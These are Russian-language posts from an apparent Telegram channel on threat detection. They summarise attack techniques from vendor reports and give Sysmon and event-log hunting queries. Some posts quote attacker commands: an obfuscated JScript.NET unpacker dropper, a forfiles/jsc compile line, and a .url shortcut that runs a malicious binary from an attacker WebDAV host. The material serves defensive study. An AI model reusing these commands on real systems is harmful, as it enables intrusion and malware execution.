Всем привет 💻 ✌️
Много обсуждений вызвали репорты Solar 4rays и ЛК об уязвимостях в VipNet, которые связанны с загрузкой вредоносных dll или подменой системных утилит. Аналогичные проблемы присутствуют во многих продуктах.
Для выполнения вредоносного кода из dll, может использоваться несколько техник, которые MITRE объединили в DLL. Она включает:
🔤 DLL Sideloading
🔤 DLL Search Order Hijacking
🔤 DLL Redirection
🔤 Phantom DLL Hijacking
🔤 DLL Substitution
🔭 Обнаружение:
🔤 отслеживаем создание новых dll файлов в директориях, где хранится исполняемый файл, и их загрузку в память процесса
🔤 запуск процесса и загрузка dll (без подписи или с невалидной подписью) из одной директории в профиле пользователя (
🔤 запуск процессов с именами системных утилит, с нестандартной цифровой подписью (отсутствием ее) или из нестандартных путей
🔤 загрузка dll или запуск дочернего процесса, которые ранее не использовались (нужно использовать ретро)
Скорее всего будет очень шумно...
#detection@detectioneasy
#ttp@detectioneasy
Много обсуждений вызвали репорты Solar 4rays и ЛК об уязвимостях в VipNet, которые связанны с загрузкой вредоносных dll или подменой системных утилит. Аналогичные проблемы присутствуют во многих продуктах.
Для выполнения вредоносного кода из dll, может использоваться несколько техник, которые MITRE объединили в DLL. Она включает:
\w:\\\\users\\.*\\.*\.dll$
). Можно объединить с предыдущимc:\windows\system32 c:\windows\syswow64 c:\windows\winsxs
Скорее всего будет очень шумно...
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
rt-solar.ru
Бэкдор VipNet: Жуи и Диндин передают привет из 2021 года
🔥7🤔4👍3
Всем привет 💻 ✌️
Недавно обсуждали уязвимости в EDR/VPN, а у EDR SentinelOne, бага by design, которая позволяет остановить службы через обновление продукта.
Как это работает❓
🔤 Как правило, во время обновления или восстановления продукта, службы и процессы EDR останавливаются
🔤 Злоумышленик запускает обновление (восстановление) через msiexec, и в момент когда процессы и службы потушились, хакер убивает процесс msiexec.exe, что приведёт к сбою установки и оставит систему без защиты.
Важные нюансы:
🔤 Уязвимость актуальна, только если вендор не реализовал механизмы самозащиты (блокировка остановки служб, запрет деинсталляции без прав админа и т.д.) или они отключены
🔤 Хакерам не нужно искать оригинальные MSI-файлы — установленные пакеты кешируются в
🔭 Обнаружение:
🔤 Обнаруживаем локальные попытки установки edr/av
🔤 Обнаруживаем попытки использования пакетов из
🔤 Отслеживаем, используемые версии средств защиты
🔤 Отслеживаем запуск msiexec от подозрительных родительских процессов
🔤 В журнале Application отслеживаем события от провайдера
События при нормальной установке пакета
События при удалении пакета
Событие при обновлении конфигурации
События при завершении установки с ошибкой
Эти события интересуют нас больше всего, именно они сгенерировались в момент обновления/восстановления продукта через msiexec
Дополнительно информацию об установленных пакетах можно посмотреть в реестре -
#detection@detectioneasy
#ttp@detectioneasy
Недавно обсуждали уязвимости в EDR/VPN, а у EDR SentinelOne, бага by design, которая позволяет остановить службы через обновление продукта.
Как это работает
Важные нюансы:
%WINDIR%\Installer
msiexec /i
или восстановления msiexec /fa
%WINDIR%\Installer
, совпадающих с вашим вендором или установкой по GUID, который можно найти в реестре HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
MsiInstaller
События при нормальной установке пакета
1040 (путь к msi-файлу, и pid процесса, который запустил установку) -> 1042 (путь к msi-файлу, pid процесса, который запустил установку) -> 11707 (установка успешна, можем увидеть имя продукта\производителя)-> 1033 (установка завершена с кодом 0, тут можем увидеть sid-пользователя, название продукта и версию, может быть полезно для заполнения контроля установленных версий)
События при удалении пакета
11724 -> 1034 (продукт удален, тут можем увидеть название продукта и версию)
Событие при обновлении конфигурации
11728 (обновление конфигурации) - генерируется при запуске той же версии msi-пакета
События при завершении установки с ошибкой
1033 (название продукта и версию, с кодом завершения отличным от 0) ->11708 (установка завершена с ошибкой, sid-пользователя, название продукта)
Эти события интересуют нас больше всего, именно они сгенерировались в момент обновления/восстановления продукта через msiexec
Дополнительно информацию об установленных пакетах можно посмотреть в реестре -
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\
<SID>\Products\
<GUID>\InstallProperties
. В этом разделе реестра есть интересный ключ - InstallSource
по которому можно похантить аномалии в установке EDR и т.п.#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Aon
Bring Your Own Installer: Bypassing EDR Through Agent Version Change Interruption
Bring Your Own Installer is a technique which can be used by threat actors to bypass EDR protection on a host through timed termination of the agent update process when inadequately configured.
🔥11👍5🤔3
Всем привет 💻 ✌️
Небольшой гайд, по созданию профиля Volatility для Linux операционных систем. В In-House SOC и MSSP идеально иметь профили под все используемые дистрибутивы и версии ядра, для этого необходимо внедрить процесс взаимодействия с it
#detection@detectioneasy
Небольшой гайд, по созданию профиля Volatility для Linux операционных систем. В In-House SOC и MSSP идеально иметь профили под все используемые дистрибутивы и версии ядра, для этого необходимо внедрить процесс взаимодействия с it
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
xakep.ru
Уроки форензики. Создаем профиль Volatility для анализа инцидентов в Linux
Инструмент Volatility давно стал стандартом в цифровой криминалистике, но его эффективность напрямую зависит от корректного профиля операционной системы, который выступает «переводчиком» между сырыми данными памяти и понятной человеку информацией. В этой…
🔥10👍7😁4
Всем привет 💻 ✌️
Что происходит, когда админ забыл пароль от локальной учетки? Смотрит laps?)
Или по-старинке заменит
Последний вариант, может стать точкой входа для хакеров. Представим ситуацию, админ за собой не убрался, сервер торчит в интернет (такого не бывает😄 )
Плохие парни нажимают пару раз shift и получают права system👤 на серваке
🔭 Что же нам делать?
🔤 отслеживаем копирование системных файлов
🔤 хантим, чтобы описание файла не отличалось от его имени
🔤 обнаруживаем запуск утилит из специальных возможностей, от родителя
🔤 для профилактики берем хеш cmd.exe с каждого компа (если нет базы) и проверяем файловую систему на совпадения
#detection@detectioneasy
#ttp@detectioneasy
Что происходит, когда админ забыл пароль от локальной учетки? Смотрит laps?)
Или по-старинке заменит
sethc.exe
(utilman.exe
) на cmd.exe, и создаст нового пользователя?Последний вариант, может стать точкой входа для хакеров. Представим ситуацию, админ за собой не убрался, сервер торчит в интернет (такого не бывает
Плохие парни нажимают пару раз shift и получают права system
sethc.exe,
utilman.exe, osk.exe, Magnify.exe, Narrator.exe, DisplaySwitch.exe
winlogon.exe
и пользователя system
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍6🤔2❤1
Всем привет 💻 ✌️
Рассмотрим атаку с безфайловым PowerShell-загрузчиком, который запускает Remcos RAT в память.😈
Что происходит❓
Злоумышленники рассылают фишинговые письма с ZIP-архивами, внутри — поддельные LNK-файлы (часто маскируются под PDF или документы).
При открытии срабатывает цепочка:
🔤 LNK → MSHTA.exe — запускает обфусцированный HTA с удаленного ресурса.
🔤 HTA → PowerShell — vbs-скрипт используется как прокси, для запуска powershell команд: добавление в закреп
🔤 In-Memory Loader — загруженный powershell декодирует base64, выделяет память через
Powershell Loader - может быть и супер крутой, обфусцированный, использует callback, но шаги до его запуска вообще не opsec)
Очень шумно, закреп hta в реестр, запуска hta с удаленного сервера, загрузка файлов через powershell, добавление в исключение defender...) powershell скрипт с base64 и virtualalloc
🔭 Обнаружение:
🔤 MSHTA.exe с http(s) точность близка к 100%
🔤 Закреп скриптов в
🔤 Сетевые подключения от PowerShell (и в целом) на нестандартные порты за пределами корпоративной сети
🔤 Опасные командлеты в powershell
🔤 Добавление исключений в defender (в AV)
Может получиться интересный хант
#detection@detectioneasy
#ttp@detectioneasy
Рассмотрим атаку с безфайловым PowerShell-загрузчиком, который запускает Remcos RAT в память.
Что происходит
Злоумышленники рассылают фишинговые письма с ZIP-архивами, внутри — поддельные LNK-файлы (часто маскируются под PDF или документы).
При открытии срабатывает цепочка:
HKCU:\…\CurrentVersion\Run
, загрузки hta, ps1 и decoy-файла в C:\Users\Public
, добавление директории C:\Users\Public
в исключения Windows Defender (Add-MpPreference -ExclusionPath
). В закреп добавлялась powershell-команда для запуска hta_)VirtualAlloc
, копирует шеллкод и запускает его через CallWindowProcW
, запускается Remcos RATPowershell Loader - может быть и супер крутой, обфусцированный, использует callback, но шаги до его запуска вообще не opsec)
Очень шумно, закреп hta в реестр, запуска hta с удаленного сервера, загрузка файлов через powershell, добавление в исключение defender...) powershell скрипт с base64 и virtualalloc
HKLM\...\Run
и HKCU\...\Run
VirtualAlloc
, CallWindowProcW
Может получиться интересный хант
Мы можем собрать и группировать исключения AV с хостов.
Обращаем внимание на пути, которые повторяются реже всего, если не пробили всю инфру))
Полезно проверять, что в директориях исключений AV лежит_)
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Qualys
Fileless Execution: PowerShell Based Shellcode Loader Executes Remcos RAT | Qualys
Cybercriminals are progressively turning PowerShell to launch stealthy attacks that evade traditional antivirus and endpoint defenses. By running code directly in memory, these threats leave minimal…
👍7🔥5🤔2❤1
Интересный доклад на phd о работе планировщика задач и способах сокрытия задач
#detection@detectioneasy
#ttp@detectioneasy
#detection@detectioneasy
#ttp@detectioneasy
phdays.com
Positive Hack Days
Международный фестиваль по кибербезопасности для всех, кто хочет погрузиться в мир кибербеза и круто провести время
🔥15❤3👍3🤔1
Detection is easy
Интересный доклад на phd о работе планировщика задач и способах сокрытия задач #detection@detectioneasy #ttp@detectioneasy
Всем привет 💻 ✌️
Наконец-то досмотрел доклады с phd) Спасибо всем спикерам за проделанную работу и шеринг знаний)
Offense/Defense
🔤 Abuse GPO AD
🔤 Отключение EDR/AV
🔤 Смотрим глубже: ищем подозрительные COM-запросы на уровне ALPC
🔤 Опыт реального перехода на detection as code
🔤 Легитимные С2: как популярные сервисы работают на хакеров
🔤 Sysinternals глазами SOC
🔤 Подходы и техники для детекта «красных» утилит. Взгляд со стороны blue team, или то, как мы видим red team
🔤 Сколько стоит SOC на open source
Больше всего отклинулось внедрение ml/llm в разные области soc/cert🧠
🔤 От данных к действиям: ML в сердце DFIR
🔤 ИИ-агенты в киберразведке
🔤 Применение легковесных LLM в аналитических задачах ИБ
🔤 LLM и агенты: разгоняем SOC
🔤 AutoML threat detection: повышаем уровень автономности SOC
#detection@detectioneasy
#ttp@detectioneasy
Наконец-то досмотрел доклады с phd) Спасибо всем спикерам за проделанную работу и шеринг знаний)
Offense/Defense
Больше всего отклинулось внедрение ml/llm в разные области soc/cert
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
phdays.com
Positive Hack Days
Международный фестиваль по кибербезопасности для всех, кто хочет погрузиться в мир кибербеза и круто провести время
🔥9👍4🍌4👏2
Всем привет 💻 ✌️
В отчете Bi.Zone рассмотрена работа двух вредоносных кампаний.
Давайте рассмотрим одну из них
🔤 Атака начинается с фишинга, пользователям присылают ссылку при переходе по которой загружается zip-архив с lnk и ini-файлом. INI по факту является архивом, в котором exe, dll и decoy-pdf. EXE - это легитимный бинарь с подписью, но уязвимый к загрузке dll
🔤 Выполняется команда LNK, которая ищет архив в каталоге пользователя
🔤 Далее проверяется наличие легитимного файла из вложенного архива, он запускается и загружает в память вредоносную библиотеку (С# Loader), для запуска файла используется команда
🔤 Если файла из шага 2 нет, то проверяется наличие
🔤 Для запуска компиляции JScript.NET используется jsc.exe, который в свою очередь запускается с помощью LOLBAS - forfiles. Исполняемый файл сохраняется с именем
Работа загрузчика подробно расписана в репорте, но стоит выделить основные моменты:
🔤 При обращении к серверу используется следующая строка заголовка
🔤 Создается рабочий каталог
🔤 Для закрепления создается
🔤 Для защиты от песочниц следующего этапа, атакующие проверяют систему, и если он не соответствует критериям, то загружается
🔭 Обнаружение
🔤 по классике, отслеживаем создание LNK-файлов
🔤 основным тригером для нас должны стать команды из LNK. набор триггеров и LOLBAS и .Net, касательно этой кампании можем поискать использование
🔤 создание скриптов в директории автозагрузки
Похантить можно:
🔤 user-agent
🔤 наличие скриптов в директории автозагрузке пользователя
🔤 обращение на
#detection@detectioneasy
#ttp@detectioneasy
В отчете Bi.Zone рассмотрена работа двух вредоносных кампаний.
Давайте рассмотрим одну из них
%USERPROFILE%
, создает JScript.NET файл. Он распаковывает zip-архив, замаскированный под расширение INIset /p="import System;import System.IO;import System.IO.Compression;import System.Text;import System.Diagnostics;function Main(){var args:String[]=System.Environment.GetCommandLineArgs();Directory.CreateDirectory(args[2]);System.IO.Compression.ZipFile.ExtractToDirectory(args[1], args[2]);System.IO.Compression.ZipFile.ExtractToDirectory(args[2] + "\\" + (Convert.ToChar(117)+Convert.ToChar(109)+Convert.ToChar(46)+Convert.ToChar(105)+Convert.ToChar(110)+Convert.ToChar(105)), args[2]);Process.Start("cmd.exe", "/C move " + System.Reflection.Assembly.GetExecutingAssembly().Location + " " + System.Reflection.Assembly.GetExecutingAssembly().Location + "_");}Main();">%TEMP%\UKSS1G4Q7H6S.a
start
с применением обфускации^st^art "" /MIN "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" & exit
unzip.exe
(скомпилированный JScript.NET), который распаковывает фальшивый INI-файлif exist %TEMP%\unzip.exe (%TEMP%\unzip.exe "%f" "%USERPROFILE%\J8ZUARAW71W7")
%TEMP%\unzip.exe
(C:\Windows\system32\forfiles.exe /P %SystemRoot% /M notepad.exe /C "cmd /c %_jsc% /nologo /r:System.IO.Compression.FileSystem.dll /out:%TEMP%\unzip.exe %TEMP%\UKSS1G4Q7H6S.a")
Работа загрузчика подробно расписана в репорте, но стоит выделить основные моменты:
User-Agent: «Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
%APPDATA%\74EJ6RTFKKRS
startapp.bat
в каталоге автозагрузки, который запускает %APPDATA%\74EJ6RTFKKRS\H5GDXM70NJ.exe
hxxps://huggingface[.]co/TheBloke/Llama-2-70B-GGUF/resolve/main/llama-2-70b.Q5_K_M.gguf
forfiles.exe
и start.exe
Похантить можно:
User-Agent: «Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
hxxps://huggingface[.]co/TheBloke/Llama-2-70B-GGUF/resolve/main/llama-2-70b.Q5_K_M.gguf
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
BI.ZONE
ВПО или LLM? Silent Werewolf использует новые загрузчики в атаках на российские и молдавские организации
Злоумышленники ограничивают возможность получать вредоносную нагрузку. Это делает ВПО менее отслеживаемым, а также усложняет для исследователей изучение самой группировки
🔥8👍3🤔2
Всем привет 💻 ✌️
Давайте сегодня поговорим о теме абстракции, касательно всех команд SOC. Тема не новая, но многие забывают о ней или не осознают ее значимость.
Абстракция - это концепция, с помощью которой детали реализации скрыты от пользователя или автоматизированы для него
Для наглядного примера я взял скриншот из проекта AbstractionMaps.
💙 Детектирование может строиться на:
🔤 Используемых утилитах - эффективно, если корректно внедрен CTI, мы понимаем контекст того, какие группировки интересуются нашей организацией и следим за ними. Названия, метаинформация файлов, User-Agent'ы, сертификаты по умолчанию и т.п.
🔤 Утилиты строятся на использовании протоколов, API/WinAPI - так мы можем их обобщить и писать правила для обнаружения нескольких инструментов одновременно.
🔤 WinAPI под капотом часто использует RPC-интерфейсы и соответствующие методы.
🔤 В зависимости от выполняемых действий, на нижнем уровне могут быть обращения к файловой системе, реестру, сетевым протоколам.
Данный подход позволяет изучить исследуемый объект с нескольких сторон и сделать наши правила более универсальными.
❤️ Красной команде понимание абстракции важно при написании инструментов и повышении стелс-возможностей.
Рассмотрим процесс создания службы. Сколько вариантов вы можете назвать? 2-3 или больше? Например:
🔤 Утилита sc.exe create
🔤 Командлет New-Service
🔤 Invoke-PSExec
...и этот список можно продолжать бесконечно (yet another tool ✌️). А если углубиться ниже, все инструменты в конечном итоге используют одни и те же системные интерфейсы и их методы:
🔤 Вызов RPC, интерфейс UUID
🔤 Named pipe
Можно создать службу и через реестр), и тогда все вышеописанное окажется бесполезным).
Мы рассмотрели способы создания служб, но все созданное должно где-то храниться. В Windows основные конфигурации хранятся в реестре, остальные данные — в других структурах. Для эффективного детектирования нам нужно отслеживать создание ключей реестра, а также другие низкоуровневые события, опираясь на модель абстракции.
P.S. Эффективной практикой будет также отслеживание попыток изменения легитимных служб
#detection@detectioneasy
Давайте сегодня поговорим о теме абстракции, касательно всех команд SOC. Тема не новая, но многие забывают о ней или не осознают ее значимость.
Абстракция - это концепция, с помощью которой детали реализации скрыты от пользователя или автоматизированы для него
Для наглядного примера я взял скриншот из проекта AbstractionMaps.
Данный подход позволяет изучить исследуемый объект с нескольких сторон и сделать наши правила более универсальными.
Рассмотрим процесс создания службы. Сколько вариантов вы можете назвать? 2-3 или больше? Например:
...и этот список можно продолжать бесконечно (yet another tool ✌️). А если углубиться ниже, все инструменты в конечном итоге используют одни и те же системные интерфейсы и их методы:
{367ABB81-9844-35F1-AD32-98F038001003}
\PIPE\svcctl
Можно создать службу и через реестр), и тогда все вышеописанное окажется бесполезным).
Мы рассмотрели способы создания служб, но все созданное должно где-то храниться. В Windows основные конфигурации хранятся в реестре, остальные данные — в других структурах. Для эффективного детектирования нам нужно отслеживать создание ключей реестра, а также другие низкоуровневые события, опираясь на модель абстракции.
P.S. Эффективной практикой будет также отслеживание попыток изменения легитимных служб
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13👍2🤔2
Detection is easy
Всем привет! 💻 ✌️ Сегодня рассмотрим технику fake captcha Да, вам не показалось, суть техники: вам присылают письмо со ссылкой или файл, в котором ссылка. После перехода по ней, появляется окошко - нужно подтвердить, что ты не робот 🤖 Капча необычная,…
По информации от TI Bi.Zone ClickFix зафиксирован в кампаниях нацеленных на российские организации
Наши читатели были к этому готовы✔️
#detection@detectioneasy
Наши читатели были к этому готовы
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
BI.ZONE
Подтвердите, что вы не робот: для атак на российские компании стали использовать фейковую CAPTCHA
Около 30 российских компаний были атакованы в мае — начале июня с использованием техники ClickFix, которая заставляет пользователей самостоятельно запускать вредоносные скрипты. Ранее таким атакам подвергались только зарубежные организации
🔥8👍3🤔2
Познакомимся с regseek - это база данных важных ключей реестра с их описанием, насчитывает порядка 139 артефактов.
И зачем нам это❓
🔤 Оценить качество собираемых событий. В репозитории артефакты разделены по доменам, понятно, что некоторые ключи могут быть не связаны напрямую с деятельностью APT и т.п., но помогут обнаружить нарушение политик ИБ
🔤 Обогатить собираемые события (алерты) описанием из репозитория
#detection@detectioneasy
И зачем нам это
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13🤔5👍4
Отчет от CheckPoint, для атаки используется URL-файл - да опять)
Содержимое:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D
В целом ничего необычного, только
iediagcmd.exe
выполняет ряд команд:
ipconfig.exe /all
netsh.exe in tcp show global
netsh.exe advfirewall firewall show rule name=all verbose
route.exe print
В рабочей
WorkingDirectory=\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr
хакеры размещают вредоносный route.exe
, который и запускается после открытия файлаТакже для атак использовался легитимный файл -
CustomShellHost.exe
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
www.kaspersky.ru
CVE-2025-33053: RCE в WebDAV
Microsoft закрыла уязвимость CVE-2025-33053 в Web Distributed Authoring and Versioning (WebDAV), позволяющую злоумышленникам удаленно запустить произвольный код на компьютере жертвы.
👍10🔥4🤔2
Detection is easy
Всем привет 💻 ✌️ Злоумышленники злоупотребляют WebDAV для доставки вредоносов или запуска нагрузки с удаленного сервера. 🔭 Обнаружение: 🔤 Обнаруживаем запуск net.exe или net1.exe с аргументами "\\\\*@SSL\\*", "http*", "\\\\*@*\\*", "*DavWWWRoot*" 🔤 Отслеживаем…
ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and CurrentDirectory startswith "\\\\"
ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and Image startswith "\\\\"
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7🤔5👍4
Свеженький проект C2 -
#detection@detectioneasy
GoClipC2.
Функционал разбирать не будем интересно, что разработчики сразу предложили sigma-правила для обнаружения работы маяка#detection@detectioneasy
GitHub
GitHub - ZephrFish/GoClipC2: Clipboard for Command and Control between VDI, RDP and Others on Windows
Clipboard for Command and Control between VDI, RDP and Others on Windows - ZephrFish/GoClipC2
🔥9🤔7👍4
Всем привет 💻 ✌️
Интересная фишинговая кампания рассмотрена в блоге
Хакеры из Mustang Panda использовали DLL Sideloading, как бы Вы думали где? В Google Chrome
Для этого расположили dll -
🔤 ZIP-архив с вложенным Chrome, название которого мимикрирует под документ -
🔤 Пользователь запускает исполняемый файл, происходит распаковка архива в
🔭 Обнаружение
🔤 отслеживаем создание исполняемых файлов в temp с motw
🔤 отслеживаем загрузку DLL без валидной подписи из одной дирректории с exe-файлом
sample
#detection@detectioneasy
#ttp@detectioneasy
Интересная фишинговая кампания рассмотрена в блоге
Хакеры из Mustang Panda использовали DLL Sideloading, как бы Вы думали где? В Google Chrome
Для этого расположили dll -
chrome_elf.dll
в дирректории с номером версии - 101.0.4951.41\chrome_elf.dll
, DLL-имеет невалидную цифровую подписьThe_Military_Balance_2025.exe
и скрытая папка с атрибутами - hidden and system, что позволит скрыть дирректорию. В этой папке и хранится dll%TEMP%
, и загрузка вредоносной dll
ProviderName="Microsoft-Windows-Sysmon" and EventId = 15 and (TargetFilename endswith ".exe:Zone.Identifier" or TargetFilename endswith ".dll:Zone.Identifier" or TargetFilename endswith ".scr:Zone.Identifier" ) and Contents=".*ZoneId=3.*"
ProviderName="Microsoft-Windows-Sysmon" and ImageLoadedPath startswith ImagePath and EventId = 7 and not (SignatureStatus = "Valid" and Signed=true)
sample
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6👍3🤔3
Всем привет 💻 ✌️
🔭 Для обнаружения
🎯 Похантить можем наличие подозрительных команд в ключе реестра:
#detection@detectioneasy
FileFix
можем отслеживать цепочку процессов, например:
ProviderName="Microsoft-Windows-Security-Auditing" and EventId = 4688 and ParentProcessName endswith "firefox.exe" and NewProcessName endswith "powershell.exe"
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔7👍3🔥3
Всем привет 💻 ✌️
mr.dox не дает отдыхать и выпускает FileFix2
Суть атаки - для решения captcha пользователю нужно сохранить html-страницу и при сохранении, поменять расширение на😇
🔭 Для обнаружения FileFix2 отслеживаем цепочку процессов, например
и запуск hta из директорий пользователя
#ttp@detectioneasy
#detection@detectioneasy
mr.dox не дает отдыхать и выпускает FileFix2
Суть атаки - для решения captcha пользователю нужно сохранить html-страницу и при сохранении, поменять расширение на
.HTA
, файл сохранится без MoTW
mshta.exe
-> powerhshell|cmd|cscript|curl|certutil
- можно хоть весь LOLBAS перечислитьи запуск hta из директорий пользователя
*:\Users\
#ttp@detectioneasy
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Mrd0X
Security Research | mr.d0x
Providing security research and red team techniques
🔥6👍3🤔2
Всем привет 💻 ✌️
Давайте познакомимся со статьей trustedsec про использование встроенных VPN-клиентов в Windows.
Windows из коробки поддерживает клиенты для PPTP, L2TP, SSTP, IKev2 - не нужно приносить с собой сторонний клиент для организации доступа
🔭 Все не так страшно, мы можем относительно легко обнаружить такое поведение:
🔤 Доступ к файлу rasphone.pbk в:
предварительно нужно настроить DACL
🔤 Отслеживаем события:
#detection@detectioneasy
#ttp@detectioneasy
Давайте познакомимся со статьей trustedsec про использование встроенных VPN-клиентов в Windows.
Windows из коробки поддерживает клиенты для PPTP, L2TP, SSTP, IKev2 - не нужно приносить с собой сторонний клиент для организации доступа
%appdata%\Microsoft\Network\Connections\Pbk\
C:\Users\All Users\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk
предварительно нужно настроить DACL
Channel="Application" and ProviderName="RasClient" and (EventId = 20221 or EventId = 20222)
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥6👍3🥰3🤔1
Всем привет 💻 ✌️
Давайте познакомимся с C2-фреймворком OnionC2
Основное преимущество
🔭 Для формирования гипотез обнаружения и Threat Hunting обратим внимание на следующие особенности агента:
🔤 Для проверки реального IP-адреса агент использует сервис
🔤 Из коробки идет два варианта закрепа - реестр и
🔤 Для реестра, стандартно, отслеживаем создание ключей в
🔤
🔤 Для выполнения команд используется
#detection@detectioneasy
#ttp@detectioneasy
Давайте познакомимся с C2-фреймворком OnionC2
Основное преимущество
OnionC2
перед аналогами, по мнению автора, — это использование сети Tor для связи сервера и клиента.By utilizing the Tor network, it ensures that communications between the C2 server and remote systems remain secure, anonymous, and available
https://checkip.amazonaws.com
Shortcut Takeover
*\Software\\Microsoft\\Windows\\CurrentVersion\Run\
, имя ключа - Agent
Shortcut Takeover
- для изменения (или создания нового) используется ярлык %USERPROFILE%\Desktop\Microsoft Edge
, целевой файл ярлыка - путь до агента, а значение аргумента - --run-lnk
, укажет агенту запустить C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
cmd.exe /C
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍3🤔2
Всем привет! 💻 ✌️
У коллег из BI.ZONE вышел отчет об использовании новых уязвимостей в WinRAR
Уязвимости использовались для получения доступа к хостам жертв - фишинг.
Письмо имеет вложение - rar-архив, который эксплуатирует CVE‑2025‑6218. Уязвимость позволяет вредоносному архиву при распаковке записывать файлы за пределами целевого каталога - значит мы можем закрепиться в папку автозагрузки текущего пользователя.
🔭 Обнаружение строится достаточно легко:
Если атакующие продвинутые можно комбнировать несколько процедур, например заменить LNK на рабочем столе или разместить там RDP-rogue файл... Это уже будет другое правило)
#detection@detectioneasy
#ttp@detectioneasy
У коллег из BI.ZONE вышел отчет об использовании новых уязвимостей в WinRAR
Уязвимости использовались для получения доступа к хостам жертв - фишинг.
Письмо имеет вложение - rar-архив, который эксплуатирует CVE‑2025‑6218. Уязвимость позволяет вредоносному архиву при распаковке записывать файлы за пределами целевого каталога - значит мы можем закрепиться в папку автозагрузки текущего пользователя.
ProviderName="Microsoft-Windows-Sysmon" and EventId = 11 and Image endswith "winrar.exe" and TargetFilename = ".*\Microsoft\Windows\Start Menu\Programs\Startup\"
Если атакующие продвинутые можно комбнировать несколько процедур, например заменить LNK на рабочем столе или разместить там RDP-rogue файл... Это уже будет другое правило)
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥8👍5🤔2